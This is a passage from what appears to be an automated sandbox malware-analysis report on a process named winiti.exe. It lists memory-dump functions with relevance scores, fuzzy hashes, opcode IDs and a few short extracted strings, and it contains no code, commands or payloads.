Opcode Fuzzy Hash: e912ff273967d8a631cffc6a8f2954ac10be48709c240bde38b4277ce3db4175
Instruction Fuzzy Hash: DE117C398092A4DFCB15CF64D8587E9BFB4FF4A305F14A4DAC449AA292C7706A86CF11

Function 0013D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.374866922.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_13d000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
Instruction ID: 67c540baf6bac1ad4bbaa40799964805698ccef35c79b973d5445efff56ac4c6
Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
Instruction Fuzzy Hash: AE119D75904280DFDB12CF14E5C4B16FFA1FB84314F28C6ADD8494B656C33AD85ACBA2

Function 005B098B Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a89837e5f372e5c2a9dbb8d0a7216ea4ff222d1ba83f91cfcaed77d72180f24e
Instruction ID: bfcd679594bbf0667ca83d46644fbe41952c8792d0c6a11721db639731255db9
Opcode Fuzzy Hash: a89837e5f372e5c2a9dbb8d0a7216ea4ff222d1ba83f91cfcaed77d72180f24e
Instruction Fuzzy Hash: 01112739908218CFCB54DF68C884AE9BBB9FF19300F1454E6D90DAB292C7306A85CF50

Function 005B0735 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e290e17014558a9fbab7e9af04a1ce76658e016dd98a368a37cec7677b5f08a1
Instruction ID: 3aedbc36f4396225ee3bf3eb60e4a79c4b99860da5f33db47aeb16e370b55844
Opcode Fuzzy Hash: e290e17014558a9fbab7e9af04a1ce76658e016dd98a368a37cec7677b5f08a1
Instruction Fuzzy Hash: C211ED75804228CFCB64DF64C844BEDBBF1BB59310F2094EAD00AA2291CB356E96DF00

Function 005B09BC Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cea38a0159d72f50d77fd39c8f6ce3f33fbffd74049d9851e6d16a95380a0bf
Instruction ID: 5ace73963ce9c47698727129a856c38be6bd562f60ad79414449f5d79711e769
Opcode Fuzzy Hash: 4cea38a0159d72f50d77fd39c8f6ce3f33fbffd74049d9851e6d16a95380a0bf
Instruction Fuzzy Hash: C3014C35908318CFDB54DF54C884BEDBBF9BB59300F146495D50DA7292C770AA85CF50

Function 005B0A23 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75809ee47edb386aca0e26d44a979d56ac90e30474efc6c04e0e6203b045d3ac
Instruction ID: 066d8bd0e7a9ce24abadb10e794f20497af9b115d304b6b7d1a7df8a301ce4bb
Opcode Fuzzy Hash: 75809ee47edb386aca0e26d44a979d56ac90e30474efc6c04e0e6203b045d3ac
Instruction Fuzzy Hash: 0D018875908318DFCB04DF68C890AE9BBF9BF0A300F1454A6C90DEB292D770AA84CB00

Function 005B0B71 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8414e174ceed48e5884fcd693bfdf8c5dbcdf652cba1ed8ce0d251398b1a4f7
Instruction ID: 70ea9f8f77333e6f5ae7ace0c1c91e4b7327bfe9b21098962536f8b63708d02c
Opcode Fuzzy Hash: f8414e174ceed48e5884fcd693bfdf8c5dbcdf652cba1ed8ce0d251398b1a4f7
Instruction Fuzzy Hash: 78015A39804264DFCB24CF64DC58BE8BBF4AF56312F0495EA8409A63E1D6346A8ACF10

Function 005B088E Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3466906cdfb57795d6249aaf5399d1cb9d2926cf0194c98e464ec9e2c9e9b014
Instruction ID: 5c5550702d0af297b749d179e81a24d294b58e2d85a751f3b81d905fc444c478
Opcode Fuzzy Hash: 3466906cdfb57795d6249aaf5399d1cb9d2926cf0194c98e464ec9e2c9e9b014
Instruction Fuzzy Hash: 89011434A48218CFDB25CF60CC54BE9BBB5BB09310F1455AA9508AB2A1C7746E8ADF40

Function 005B105A Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aae17608c30958fc5d248648c91063a00d157c1250d71d290d019cd94a630408
Instruction ID: 709cd30daf2839997d9c432c3cdaa43659297677746dcb4f36072afae2771a7f
Opcode Fuzzy Hash: aae17608c30958fc5d248648c91063a00d157c1250d71d290d019cd94a630408
Instruction Fuzzy Hash: 24F082748081548FDB44CF24C845EE8BBB4FB49314F1442DAC6199B286C7725B85DF50

Function 005B0220 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be34fe30be600ffa5a7390ebe8233e9c35f30aa967d2d71109182d14b628517c
Instruction ID: d1be0540602881205bb8ed5af93ee7084693653357f87b877fca0b0efb0e2f89
Opcode Fuzzy Hash: be34fe30be600ffa5a7390ebe8233e9c35f30aa967d2d71109182d14b628517c
Instruction Fuzzy Hash: 4BE03934D04208EFC740DFA8E8486ADBBB4BB4A300F1091A9C809A3350D7306A45DF81

Function 005B08EB Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6f958b71a1b4ffe1dc52494a8c2d676dbc118d291e278798a3d117e4b8b2616
Instruction ID: 437c256d981a217c39a93ad88dbf2535a6fedb63ff485b2ed407c059e960460a
Opcode Fuzzy Hash: f6f958b71a1b4ffe1dc52494a8c2d676dbc118d291e278798a3d117e4b8b2616
Instruction Fuzzy Hash: 75F03034408298CFC711CB50DC146E8BFB4AB4A308F1455D688085B2A2D7315A45CB00

Function 005B12A8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc73f8f88047ea6982823ab6997ab04cbafc41629311e5a9a26027e75073add
Instruction ID: 599c7a751b712702857a27979bd65e252f194231b6d6936250c1e775457f156c
Opcode Fuzzy Hash: 1dc73f8f88047ea6982823ab6997ab04cbafc41629311e5a9a26027e75073add
Instruction Fuzzy Hash: EAF0C93590020CEFCB05DF98D950A9DBBB5FB48310F14C0A9ED5467350C732AA61EF85

Function 005B086A Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d9836d26916fe502c6d7e7d0142eebfff4aa75578a4b032e11cb6f803d53b90
Instruction ID: 8e25241d8fca8a5282a2e151a823f6b19306dfb0168e69c66d81b476c25c41e1
Opcode Fuzzy Hash: 0d9836d26916fe502c6d7e7d0142eebfff4aa75578a4b032e11cb6f803d53b90
Instruction Fuzzy Hash: 10E0EC74D48208DBDF18CF91DC51ADDBFB6FB59300F24A069A609BB295D6302946DF40

Function 005B01C0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5208e75bdbcb5835c3ad5f46e6974937fb6366402c164bce263858bd63a192a
Instruction ID: 05888f53b301c462beadb2520baacb2a3b0a470f8ede862b47383f0f1a32d55c
Opcode Fuzzy Hash: d5208e75bdbcb5835c3ad5f46e6974937fb6366402c164bce263858bd63a192a
Instruction Fuzzy Hash: AFC0123140521CDBD704DBA8D85576E776CE741715F101199890433250DE311E40C795

Non-executed Functions

Function 0019D0D0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_190000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fcc0b0139892111e2f85475c4e13cdb168a9c9a8b5c6ee88b48db526f0022dc
Instruction ID: c375714719276db04382c87f604d094cc40e89e7656f5dcae658fdb3e46ccf5e
Opcode Fuzzy Hash: 8fcc0b0139892111e2f85475c4e13cdb168a9c9a8b5c6ee88b48db526f0022dc
Instruction Fuzzy Hash: B0E1E674E002598FCB14DFA9D590AADFBF2BF89304F24816AD814AB35AD730AD41CF61

Function 0019D508 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_190000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20d8e9b1a477e748a13493b491c5aba22b9db08b8154d14730353842e8c20cf5
Instruction ID: 98267da93ad8740860d174d8b5375a62f04211d22420d5a95f846105ae7287e7
Opcode Fuzzy Hash: 20d8e9b1a477e748a13493b491c5aba22b9db08b8154d14730353842e8c20cf5
Instruction Fuzzy Hash: 28E1E774E002598FCB14DFA9D5909AEFBF2BF89304F24816AD814AB356D731AD41CFA1

Function 0019D9F0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_190000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61ebf4e7a49a4842b0720858571079fc7ade99dafcba0635d653d6b49b9a5620
Instruction ID: a86f3176add1b2b11db8182df5f57a71b3aace8239f831bf95c19e73080bcc13
Opcode Fuzzy Hash: 61ebf4e7a49a4842b0720858571079fc7ade99dafcba0635d653d6b49b9a5620
Instruction Fuzzy Hash: 76E1E774E002598FCB14DFA9D590AADFBF2BF89304F24816AD815AB356D730AD41CFA1

Function 0019CC98 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_190000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2388d98175d8f1d6167a67fc76f40a5ced506624160c20fd9d94fa72f666c34f
Instruction ID: ea7a5926290b4cc5f4aab4b3da01af925a4d0305c04643528f4fc3b3663c8d02
Opcode Fuzzy Hash: 2388d98175d8f1d6167a67fc76f40a5ced506624160c20fd9d94fa72f666c34f
Instruction Fuzzy Hash: 6EE1F974E002598FCB14DFA9C5909AEFBF2BF89304F24816AD815AB356D731AD41CFA1

Function 0019DE28 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_190000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a100c0f700d00486e70dda7d615b6ef1d8d7ea833e4a8628f7d9e2bd17de068
Instruction ID: e398b955b539416e53fb9193219ad6a9fc20601b9a2e24c09fbe6ac2717495e2
Opcode Fuzzy Hash: 2a100c0f700d00486e70dda7d615b6ef1d8d7ea833e4a8628f7d9e2bd17de068
Instruction Fuzzy Hash: 54E1F874E002598FCB14DFA9C590AADFBF2BF89304F24816AD814AB356D770AD41CFA1

Function 0019D9E1 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_190000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f0cd71799849a8f58c3ad16e9a914fc97234feded2fe29903e05553f5f723e7
Instruction ID: eeeeee17a22d25bf956ce42aa6fcd7a7c966495589f59315df2f1f2620aa837a
Opcode Fuzzy Hash: 3f0cd71799849a8f58c3ad16e9a914fc97234feded2fe29903e05553f5f723e7
Instruction Fuzzy Hash: 2D512C74E042598FDB14DFA9D5905AEFBF2BF89304F2481AAD408AB356D7309E41CFA1

Analysis Process: winiti.exePID: 3468, Parent PID: 3392COMMON

Executed Functions

Function 002DF358 Relevance: 8.0, Strings: 6, Instructions: 545COMMON

Download Yara Rule

Strings

$p, xrefs: 002DFA63
$p, xrefs: 002DFA57
$p, xrefs: 002DFA87
$p, xrefs: 002DFA2E
$p, xrefs: 002DFA7B
$p, xrefs: 002DFA3A

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID: $p$$p$$p$$p$$p$$p
API String ID: 0-3402276426
Opcode ID: ed50afde0b8a740554da2588d064621a5a9966ee2c97a9b6182df9cc83841526
Instruction ID: 5d1f7464cc0ba4a785288d2a9ba2c8e70a4ed9c7f2200c04026fb87de7c89bf1
Opcode Fuzzy Hash: ed50afde0b8a740554da2588d064621a5a9966ee2c97a9b6182df9cc83841526
Instruction Fuzzy Hash: A6321F31E10756CBCB14EF64D8946ADF7B2BFC9300F60C66AD44AA7254EB70AE85CB40

Function 002DC050 Relevance: 2.2, Instructions: 2226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5693d033bbc29a5e6424e5a3806e5f7fd70b1a28dfcedccda5d76e7f318fb4cf
Instruction ID: 3141d65fdf24451292eb950e0b4c9aa6e32c0bbf5e2c3b79b3acaabfafaaec56
Opcode Fuzzy Hash: 5693d033bbc29a5e6424e5a3806e5f7fd70b1a28dfcedccda5d76e7f318fb4cf
Instruction Fuzzy Hash: 80331F31D10B1A8ECB11EF68C8846ADF7B1FF99300F55C79AE458A7211EB70AAD5CB41

Function 00726560 Relevance: .6, Instructions: 638COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df00795db325770310e8fa85b6972c151c4c8f92796e43ea5299ebfe312267f2
Instruction ID: f3c590f69c05731d2177a25a3f1366ac3c404e08a831e5941f7c7eaefd62b245
Opcode Fuzzy Hash: df00795db325770310e8fa85b6972c151c4c8f92796e43ea5299ebfe312267f2
Instruction Fuzzy Hash: 29327074B002199FDF15DB68E594BADB7B2FB88310F20842AE405EB359DB39ED45CB90

Function 00725609 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f08259748a76bfa7623fb7e943cfdf0f1488d9382d438229a59d60cf9dd9a60
Instruction ID: bb64c9def6968112145667ebb1eff429b3fa2b7e0b5237cbf2b1a712fd1e00ad
Opcode Fuzzy Hash: 4f08259748a76bfa7623fb7e943cfdf0f1488d9382d438229a59d60cf9dd9a60
Instruction Fuzzy Hash: D6227070B006198FEF24DB98E4C4BADB7B2EB95310F648925E405EB395DB38DD81CB91

Function 002D4520 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 789ced45adc6ff3bf6434c7b2eba549af17f9911b3f3b2296ec705903b16df98
Instruction ID: 48026fe0693dc938327e02104a546945b5fbf8e944549d5cedf08af0c37be06d
Opcode Fuzzy Hash: 789ced45adc6ff3bf6434c7b2eba549af17f9911b3f3b2296ec705903b16df98
Instruction Fuzzy Hash: A5B18C70E1020A8FDF10DFA8D88579DBBF6AF89354F24812AD815EB394EB749C55CB81

Function 002D3908 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9de6b46d4fe362215a662baf700a21984ee58055f0a66fa27b9ca1d0544cc569
Instruction ID: 180ea189e0839195895312efbf5afd4a542ad01719a6871be81880c1f4e0627c
Opcode Fuzzy Hash: 9de6b46d4fe362215a662baf700a21984ee58055f0a66fa27b9ca1d0544cc569
Instruction Fuzzy Hash: A7917C71E1020A9FDF10CFA9C8857EDBBF2AF88314F14812AD445AB394EB749D55CB82

Function 00725A18 Relevance: 8.0, Strings: 6, Instructions: 472COMMON

Download Yara Rule

Strings

$p, xrefs: 00725FAE
$p, xrefs: 00725F86
$p, xrefs: 00725FE2
$p, xrefs: 00725FBA
$p, xrefs: 00725F7A
$p, xrefs: 00725FEE

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID: $p$$p$$p$$p$$p$$p
API String ID: 0-3402276426
Opcode ID: fcf198b85a2548d06aa247df4d157acf933d3ab6f1406b3c7f87c7c7a69c7503
Instruction ID: b17e48774a3735febe2ff477fa1e162edcdad2293c5b2ef062af7a159d56572c
Opcode Fuzzy Hash: fcf198b85a2548d06aa247df4d157acf933d3ab6f1406b3c7f87c7c7a69c7503
Instruction Fuzzy Hash: F1029F30A006158FDB24DFA8E584BADB7B2FF84310F64892AE415DB355DB39DD85CB90

Function 00721440 Relevance: 7.9, Strings: 6, Instructions: 405COMMON

Download Yara Rule

Strings

$p, xrefs: 00721955
$p, xrefs: 00721789
$p, xrefs: 00721949
$p, xrefs: 0072177D
$p, xrefs: 00721723
$p, xrefs: 007218DD

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID: $p$$p$$p$$p$$p$$p
API String ID: 0-3402276426
Opcode ID: 50727115d94b1bfa98f283f5c59562c36880b4b6685c500b8aac4e5379450f8a
Instruction ID: 722e20bec47a331a57bd6de4b791af0cc62c3dd260f4384b5dea0e3820beb79a
Opcode Fuzzy Hash: 50727115d94b1bfa98f283f5c59562c36880b4b6685c500b8aac4e5379450f8a
Instruction Fuzzy Hash: EAF12970A11214CFCB19EFA4E494B6EBBB2FF94300F648569D8459B359DB35ED82CB80

Function 0072CAA8 Relevance: 5.4, Strings: 4, Instructions: 395COMMON

Download Yara Rule

Strings

Tep, xrefs: 0072CC0D
Gs, xrefs: 0072CD66
DJs, xrefs: 0072CE54
Tep, xrefs: 0072CE13

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID: DJs$Tep$Tep$Gs
API String ID: 0-1132754292
Opcode ID: 9f7cd497a50b492adbdf6f002273183fd699fc621456b8b48e3143d13bfacd5f
Instruction ID: d6a62a28c93d190cff70fcbb00badc8edb9d468657e66f79a7ec09643e0f2fe1
Opcode Fuzzy Hash: 9f7cd497a50b492adbdf6f002273183fd699fc621456b8b48e3143d13bfacd5f
Instruction Fuzzy Hash: 1DE17E75A003288FDB25DB68D490BADB7B2FF99300F248929E40AEB355DB35DD42DB50

Function 00723510 Relevance: 5.2, Strings: 4, Instructions: 230COMMON

Download Yara Rule

Strings

$p, xrefs: 00723563
$p, xrefs: 00723592
$p, xrefs: 0072359E
$p, xrefs: 00723557

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID: $p$$p$$p$$p
API String ID: 0-3121760203
Opcode ID: 7fc657913a152e714acd26140eef15fabb476da32bd67fff4be55468de2c03ac
Instruction ID: 5db2b87da9b2ac1981ca44fa3c59657f0ef5d5f56dfdd834585808cdc8bfc5e8
Opcode Fuzzy Hash: 7fc657913a152e714acd26140eef15fabb476da32bd67fff4be55468de2c03ac
Instruction Fuzzy Hash: 91915E74B0021A8BDB54DF74E894BAE77F6AF84300F508469D809AB344EF78DE45CB90

Function 00727330 Relevance: 4.5, Strings: 3, Instructions: 799COMMON

Download Yara Rule

Strings

$p, xrefs: 00727727
$p, xrefs: 0072772F
$p, xrefs: 0072773B

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID: $p$$p$$p
API String ID: 0-4193490398
Opcode ID: c20d849fdb4286f854b7a9c750da88d41ceb7a538a2437b49b98946d0a8c1f41
Instruction ID: 9e64e63b6c9c435e13babeb377c40b8ef0bf094894f8648554b87cc14d7c5bb2
Opcode Fuzzy Hash: c20d849fdb4286f854b7a9c750da88d41ceb7a538a2437b49b98946d0a8c1f41
Instruction Fuzzy Hash: 61625D30A00356CFCB1AEB68E585A5DB7B2FF84300BA4C968D0099F359DB75ED46CB84

Function 002D5090 Relevance: 1.5, Strings: 1, Instructions: 259COMMON

Download Yara Rule

Strings

LRp, xrefs: 002D5160

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID: LRp
API String ID: 0-3405495957
Opcode ID: 3059ff5fd2ddc638629558ed78b0e8a8760fd585858429ff789b89c4414209e5
Instruction ID: ad61a5701fa8e965f9b04c736765a8860f0d0d71b434e0759790e5e661ea73f4
Opcode Fuzzy Hash: 3059ff5fd2ddc638629558ed78b0e8a8760fd585858429ff789b89c4414209e5
Instruction Fuzzy Hash: 02918034B206268FCB14DF68C498B6E77B2EF89310F24446AE406DB3A5DBB4DC55CB91

Function 0072A508 Relevance: 1.5, Strings: 1, Instructions: 210COMMON

Download Yara Rule

Strings

PHp, xrefs: 0072A6F4

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID: PHp
API String ID: 0-2495607638
Opcode ID: e905bf57b55fd1022f4fcf03f7d937dc2ad0c4dd54e57ea167830b5764aa2c8a
Instruction ID: e4ccf322ecd91989807ea1695888ac02a24e6732d58a9a78ed3d54c5d1ec2cc5
Opcode Fuzzy Hash: e905bf57b55fd1022f4fcf03f7d937dc2ad0c4dd54e57ea167830b5764aa2c8a
Instruction Fuzzy Hash: 9951F331B00325AFDB159A78A8547AE77B7EBC4320F24852AD00ADB384DF38CD4287D6

Function 0072C840 Relevance: 1.4, Strings: 1, Instructions: 175COMMON

Download Yara Rule

Strings

dChg, xrefs: 0072C8EE

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID: dChg
API String ID: 0-2569968005
Opcode ID: 5ddf81590e7a92b3af5738f627efac3e4f4eb0fbcd33c0064314fb6f58302cf6
Instruction ID: f6459730e78e5d1d2dd7c54d41a28872b39c0a0cad9c30d0339d73ccacbcface
Opcode Fuzzy Hash: 5ddf81590e7a92b3af5738f627efac3e4f4eb0fbcd33c0064314fb6f58302cf6
Instruction Fuzzy Hash: 0151E031B00219DFDB25EB78F8596ADB7B2FF98311F108869D10AE7290DB399D45CB80

Function 002D5080 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

LRp, xrefs: 002D5160

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID: LRp
API String ID: 0-3405495957
Opcode ID: ce35635bc6f4d0821a8889ef17e2ff5a1ad15bd77511b8da883848b8be298582
Instruction ID: 8ecd7876f63f8a28ecedf072f739e7151662448ea55d8bd148e00deee3571a71
Opcode Fuzzy Hash: ce35635bc6f4d0821a8889ef17e2ff5a1ad15bd77511b8da883848b8be298582
Instruction Fuzzy Hash: 3D410130B10A228FDF24DE78C88076E77B2EF85311F24886AE41ADB394DA74DC958790

Function 0072C0D6 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

PHp, xrefs: 0072C1FA

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID: PHp
API String ID: 0-2495607638
Opcode ID: 642e6ab8370606023b5c4d7ea5874bcc7b8a3bc2afa78c1fe82a767cab0e754e
Instruction ID: 5d9ee08e42b8ce4ed906e09331a863d3cf9e7dad9861239b2c4c60b15ac0cf2b
Opcode Fuzzy Hash: 642e6ab8370606023b5c4d7ea5874bcc7b8a3bc2afa78c1fe82a767cab0e754e
Instruction Fuzzy Hash: 5F41BD70B003158FDB16AB74E9557AE7BA3FB98310B248528D406DB396DF35CD06CB91

Function 00727EA6 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

PHp, xrefs: 00728001

Memory Dump Source

